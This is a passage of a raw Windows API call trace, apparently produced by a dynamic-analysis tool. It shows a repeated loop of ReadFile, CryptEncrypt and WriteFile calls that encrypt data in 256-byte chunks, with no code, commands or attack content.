CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.090] GetLastError () returned 0x0 [0163.090] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.090] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.090] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.090] GetLastError () returned 0x0 [0163.090] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.090] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.090] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.090] GetLastError () returned 0x0 [0163.090] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.090] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.090] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.090] GetLastError () returned 0x0 [0163.090] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.090] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.091] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.091] GetLastError () returned 0x0 [0163.091] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.091] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.091] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.091] GetLastError () returned 0x0 [0163.091] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.091] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.091] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.091] GetLastError () returned 0x0 [0163.091] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.091] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.091] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.091] GetLastError () returned 0x0 [0163.091] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.091] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.091] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.091] GetLastError () returned 0x0 [0163.091] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.091] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.091] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.091] GetLastError () returned 0x0 [0163.091] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.091] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.092] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.092] GetLastError () returned 0x0 [0163.092] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.092] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.092] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.092] GetLastError () returned 0x0 [0163.092] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.092] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.092] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.092] GetLastError () returned 0x0 [0163.092] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.092] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.092] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.092] GetLastError () returned 0x0 [0163.092] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.092] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.092] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.092] GetLastError () returned 0x0 [0163.092] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.092] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.092] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.092] GetLastError () returned 0x0 [0163.092] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.092] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.092] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.092] GetLastError () returned 0x0 [0163.092] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.093] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.093] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.093] GetLastError () returned 0x0 [0163.093] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.093] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.093] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.093] GetLastError () returned 0x0 [0163.093] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.093] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.093] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.093] GetLastError () returned 0x0 [0163.093] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.093] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.093] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.093] GetLastError () returned 0x0 [0163.093] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.093] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.093] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.093] GetLastError () returned 0x0 [0163.093] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.093] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.093] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.093] GetLastError () returned 0x0 [0163.093] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.093] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.094] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.094] GetLastError () returned 0x0 [0163.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.094] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.094] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.094] GetLastError () returned 0x0 [0163.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.094] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.094] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.094] GetLastError () returned 0x0 [0163.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.094] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.094] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.094] GetLastError () returned 0x0 [0163.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.094] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.094] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.094] GetLastError () returned 0x0 [0163.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.094] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.094] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.094] GetLastError () returned 0x0 [0163.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.094] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.095] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.095] GetLastError () returned 0x0 [0163.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.095] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.095] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.095] GetLastError () returned 0x0 [0163.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.095] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.095] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.095] GetLastError () returned 0x0 [0163.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.095] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.095] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, 